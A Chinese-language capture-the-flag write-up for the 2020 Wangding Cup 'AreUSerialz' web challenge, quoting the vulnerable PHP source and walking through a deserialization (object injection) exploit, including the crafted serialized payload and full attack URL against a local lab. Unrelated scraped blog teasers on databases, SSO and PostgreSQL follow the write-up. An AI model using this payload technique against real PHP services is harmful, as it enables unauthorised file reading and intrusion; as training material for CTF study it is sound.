题解:2020-网鼎杯-青年组-Web-AreUSerialz

一、涉及知识点

序列化 serialize():将⼀个变量的数据转换为字符串。

反序列化 unserialize():将序列化后的字符串还原。

魔术方法 __destruct(析构函数):是 PHP 内置的魔术方法,核心作用是释放资源。

魔术方法 __wakeup:是 PHP 内置的魔术方法,当使用unserialize() 函数反序列化一个对象时,PHP 会自动调用该对象所属类的__wakeup方法。核心作用是:初始化反序列化对象资源,即恢复反序列化对象的状态

二、真题解析步骤

最终目的:获得flag

1、获取源码

第一步:访问目标网站

第二步:前台界面(防御级别高,F12调试一下,不是重点)

第三步:7kscan扫描出 后台页面/子域名页面(更容易破解,重点关注)

第四步:访问后台页面/子域名页面,会下载 一个ctf.zip

第五步:解压到本地靶场查看源码 NewFlag.php 和 ctf2.php

2、分析源码

2.1 NewFlag.php 源码

<?php class NewFlag { public static function getFlag($fileName) { $res = "flag error"; if($fileName ==="NewFlag.php") { $res = "flag:{this is flag}";//好像是flag } return $res; } } ?>

2.2 ctf2.php 源码

<?php include("NewFlag.php"); highlight_file(__FILE__); class FileHandler { //这是一个类 protected $op; //protected是访问控制修饰 protected $filename; protected $content; // 没有看到 new __construct(),__construct()就不会被调用,不需要看 function __construct() { $op = "1"; $filename = "tmpfile"; $content = "Hello World!"; $this->process(); } //⑥重点2 【1就写;2就读(目的:让代码读取我的需求)】 public function process() { if($this->op == "1") {//如果是1,就调用write() 写 $this->write(); } //如果是2,就调用read() 读【⑧要想调用read(),要让op==2】 //在真正if的时候,会忽略空格, " 2"就等同于"2",这样"2"=="2"就成立,为真,就调用了read() else if($this->op == "2") { $res = $this->read(); $this->output($res); } else { $this->output("Bad Hacker!"); } } private function write() { if(isset($this->filename) && isset($this->content)) { if(strlen((string)$this->content) > 100) { $this->output("Too long!"); die(); } $res = file_put_contents($this->filename, $this->content); if($res) $this->output("Successful!"); else $this->output("Failed!"); } else { $this->output("Failed!"); } } //⑦读 有flag【想办法调用read(),就能拿到flag】 private function read() { $res = ""; if(isset($this->filename)) { $res = NewFlag::getFlag($this->filename);//flag,这是我们的目标成果 } return $res; } private function output($s) { echo "[Result]: <br>"; echo $s; } //④重点1 function __destruct() { //⑨当op==2的时候,它直接给op赋值为1;op==1,就没办法调用read(),也就拿不到flag了,怎么办呢??? //在2前面+空格,这样“ 2” === "2" 就为假,op就不会被赋值为1 if($this->op === "2") $this->op = "1"; $this->content = ""; $this->process();//⑤调用process(),我们就去看看process()里面写的什么 } } function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false; return true; } #main ①这里是入口,只是没有写main if(isset($_GET{'str'})) { //给get传一个str参数 $str = (string)$_GET['str']; if(is_valid($str)) { //②调用此 反序列化【前提是:必须先序列化】函数时,会调用__wakeup魔术方法 $obj = unserialize($str); } } //③猜测:代码执行完成后,一定会调用__destruct函数(销毁) ?>

2.3 ctf2.php 源码分析思路

第一步:找到main入口
//整个代码的入口 if(isset($_GET{'str'})) { //以get请求给接收str的上传的内容 $str = (string)$_GET['str']; if(is_valid($str)) { //调用此 反序列化【前提是:必须先序列化】函数时,会调用__wakeup魔术方法 $obj = unserialize($str); }
分析内容:
    $obj = unserialize($str); 调用反序列unserialize()函数会调用__wakeup魔术方法【反序列化的前提是 要先序列化】
    查找代码中是否调用了__wakeup魔术方法 ==》 发现没有
    猜测:代码执行完成后,一定会调用__destruct函数(销毁)
    查找代码中是否调用了__destruct ==》 发现有
第二步:查看__destruct函数
//④重点1 function __destruct() { //⑨当op==2的时候,它直接给op赋值为1;op==1,就没办法调用read(),也就拿不到flag了,怎么办呢??? //在2前面+空格,这样“ 2” === "2" 就为假,op就不会被赋值为1 if($this->op === "2") $this->op = "1"; $this->content = ""; //⑤调用process(),我们就去看看process()里面写的什么 $this->process(); }
分析内容:当op==2的时候,会被重新赋值为1 ==》 $this->process();
第三步:查看 process()函数
//⑥重点2 【1就写;2就读(目的:让代码读取我的需求)】 public function process() { if($this->op == "1") {//如果是1,就调用write() 写 $this->write(); } //如果是2,就调用read() 读【⑧要想调用read(),要让op==2】 //在真正if的时候,会忽略空格, " 2"就等同于"2",这样"2"=="2"就成立,为真,就调用了read() else if($this->op == "2") { $res = $this->read(); $this->output($res); } else { $this->output("Bad Hacker!"); } }
分析内容:
    当op==1的时候,会调用write()函数【写】
    当op==2的时候,会调用read()函数【读】
第四步:查看 write()函数 和 read()函数
//write()写函数 private function write() { if(isset($this->filename) && isset($this->content)) { if(strlen((string)$this->content) > 100) { $this->output("Too long!"); die(); } $res = file_put_contents($this->filename, $this->content); if($res) $this->output("Successful!"); else $this->output("Failed!"); } else { $this->output("Failed!"); } } //⑦read()读函数 有flag【想办法调用read(),就能拿到flag】 private function read() { $res = ""; if(isset($this->filename)) { $res = NewFlag::getFlag($this->filename);//flag,这是我们的目标成果 } return $res; } private function output($s) { echo "[Result]: <br>"; echo $s; }
分析内容:
    发现read()函数中存在flag,那就要想办法调用read()函数
    调用read()函数需要什么条件,前面提到:op==2时,调用read()函数,那就要想办法让 op==2
    怎样才能让 op==2呢??
    前面提到:【__destruct 函数中:当op==2的时候,会被重新赋值为1】,这样看 op就不能是2了
    但是 只有 op==2时,才会调用read()函数。这就很矛盾了,怎么办呢???


方法:我们给 op 赋值为 “ 2”【在2前面加空格】就满足条件了。
原理:在process() 函数中,if判断条件时,会自动忽略空格。
第五步:得出结论
1、反序列化的前提是 要先序列化,所以我们要给str一个序列化后的值

2、op==" 2"

3、获取flag 具体实现步骤

第一步:访问 ctf2.php

>根据结论得出:http://127.0.0.1/14xlh/ctf2.php?str=序列化的码

第二步:获取序列化的码

序列化在线工具: https://c.runoob.com/compile/1/

(1)需要序列化的内容
//由于代码太长,我们只保留重点部分 <?php class FileHandler { protected $op=' 2';//op==" 2" protected $filename='NewFlag.php'; protected $content='cs'; } $result=new FileHandler(); echo (serialize($result));//序列化 ?>
(2)得到的内容中有乱码

(3)修改 protected 为 public

【因为protected是受保护的,所以是乱码,我们改成public公开的,就解决乱码问题了】

//由于代码太长,我们只保留重点部分 <?php class FileHandler { public $op=' 2';//op==" 2" public $filename='NewFlag.php'; public $content='cs'; } $result=new FileHandler(); echo (serialize($result));//序列化 ?>
(4)得到序列化的码
O:11:"FileHandler":3:{s:2:"op";s:2:"2";s:8:"filename";s:11:"NewFlag.php";s:7:"content";s:2:"cs";}

第三步:组装访问

http://127.0.0.1/14xlh/ctf2.php?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:11:"NewFlag.php";s:7:"content";s:2:"cs";}

结果是错误的,什么原因呢?是phpstudy的版本太低了,我们切换为高版本。

第四步:再次访问

http://127.0.0.1/14xlh/ctf2.php?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:11:"NewFlag.php";s:7:"content";s:2:"cs";}

第五步:成功拿到flag

flag:{33858534-shegruie353-shgdg23shreigeli1234}

Read more

【手写数据库内核miniToadb】第2天 与数据库交互的桥梁--SQL解绍

【手写数据库内核miniToadb】第2天 与数据库交互的桥梁--SQL解绍

专栏内容:手写数据库toadb 本专栏主要介绍如何从零开发,开发的步骤,以及开发过程中的涉及的原理,遇到的问题等,让大家能跟上并且可以一起开发,让每个需要的人成为参与者,在开源无限的公众号更新会更及时。 一、概述 上一节通过一个简单的C语言程序来模拟数据库的行为,从处理能力来看,也有创建表,插入、删除、更新、查询等操作,但是与大家认为的数据库差距很大。 关系型数据库的一个很明显的特点,就是有标准的操纵数据库的语言,它就是常用的SQL。我们来开发的数据库内核支持这一标准SQL,这样才能符合数据库的一个审美。 说到语言,就不得不做语言的解析了,类似于自然语经过人脑分析后,转换为一系列人的动作行为;而数据库中的解析模块要把用户的SQL表达的意图经过词法和语法分析,转换成程序可处理的数据结构。 这听起来还是很有意思的,那么我们现在就开始这第一步吧。 在开始之前再补充一些内容,整个开发过程主要使用C语言开发,在解析中会用到正则表达式和上下文无关语法,它们占比非常小。 开发所用的系统是CentOS 8.2,当然其它linux版本可能命令会有差异,Centos系列还是比较一致,可以看

By Ne0inhk
数字身份的通行证:深入解析单点登录(SSO)的架构与艺术

数字身份的通行证:深入解析单点登录(SSO)的架构与艺术

文章目录 * 概述 * 一、什么是单点登录(SSO)? * 二、SSO 的核心价值:为何它如此重要? * 三、SSO 的基本工作原理:一次认证,处处通行 * 场景一:首次登录应用 A * 场景二:访问应用 B(无感登录) * 四、SSO 的通用语言:常见协议与标准 * 五、SSO 架构的两种主流形态 * 1. **中心化 SSO** * 2. **联邦身份** * 六、安全:SSO 的生命线 * 七、典型应用场景:SSO 在哪里发光? * 八、快速上手:从理论到实践 * 九、常见误区澄清 * 总结 概述 在数字世界日益碎片化的今天,我们每个人都在无数应用和服务之间穿梭,

By Ne0inhk
告别SQL恐惧症:我用飞算JavaAI的SQL Chat,把数据库变成了“聊天室”

告别SQL恐惧症:我用飞算JavaAI的SQL Chat,把数据库变成了“聊天室”

摘要 对于许多开发者而言,与数据库打交道意味着繁琐的语法记忆、复杂的联表查询以及令人头疼的性能优化。你是否曾希望,能用说人话的方式直接操作数据库?飞算JavaAI专业版的SQL Chat功能,正是这样一个革命性的工具。本文将分享我如何将它变为一个永不疲倦的“数据库专家同事”,用自然语言轻松搞定一切数据需求。 一、 痛点切入:我们与SQL的“爱恨纠葛” 还记得那次惨痛的经历吗?新接手一个庞大项目,急需从几十张表中查询一份用户行为报表。你对着模糊的需求文档,在Navicat或DBeaver中艰难地敲打着JOIN、WHERE和GROUP BY,一遍遍执行、调试,生怕一个疏忽就拉垮了线上数据库。这不仅是技能的考验,更是对耐心和细心程度的终极折磨。 尤其是面对以下场景,无力感尤甚: * 复杂查询:涉及多表关联、嵌套子查询、窗口函数,SQL语句长得像一篇论文。 * 性能优化:一条SQL跑起来慢如蜗牛,却不知从何下手添加索引或改写。 * 老项目溯源:面对命名随意的表和字段,理解业务逻辑如同破译密码。 我们需要的不是一个更漂亮的SQL客户端,而是一个能理解我们意图的“智能数据库搭档”

By Ne0inhk

PostgreSQL:详解 PostgreSQL 与Hadoop与Spark的集成

更多内容请见: 《深入掌握PostgreSQL数据库》 - 专栏介绍和目录 文章目录 * 一、为什么需要集成?—— 架构演进的必然 * 1.1 各自定位与互补性 * 二、核心集成模式概览 * 三、PostgreSQL 与 Hadoop 集成 * 3.1 使用 Apache Sqoop(传统批同步) * 安装与配置 * 从 PG 导出到 HDFS * 从 HDFS 导入到 PG * 3.2 使用 Debezium(CDC 实时同步) * 步骤 1:启用 PG 逻辑复制 * 步骤 2:部署 Debezium Connector(Kafka

By Ne0inhk